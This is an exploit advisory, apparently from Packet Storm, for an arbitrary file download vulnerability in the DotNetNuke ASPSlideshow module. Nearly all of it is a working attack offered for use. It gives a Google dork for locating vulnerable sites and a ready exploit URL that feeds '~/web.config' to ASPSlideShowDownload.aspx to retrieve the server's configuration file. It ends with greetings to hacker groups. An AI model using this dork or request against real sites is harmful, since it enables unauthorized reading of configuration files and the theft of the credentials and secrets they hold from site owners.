DotNetNuke ASPSlideshow module suffers from an arbitrary file download vulnerability.
37fe2d18a6788c5fd3878f3e6511ca1842becb1a64fef6328d7baa98263205b4#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : DNN (DotNetNuke®) ASPSlideshow Module Arbitrary File Download Vulnerability
# Author : alieye
# vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Google Dork: inurl:/DesktopModules/+inurl:/ASPSlideshow/
# Version: all version
# Date: 09/06/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can download any file from your target ;)
Exploit : http://victim.com/DesktopModules/ASPSlideShow/ASPSlideShowDownload.aspx?ID=~/web.config
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed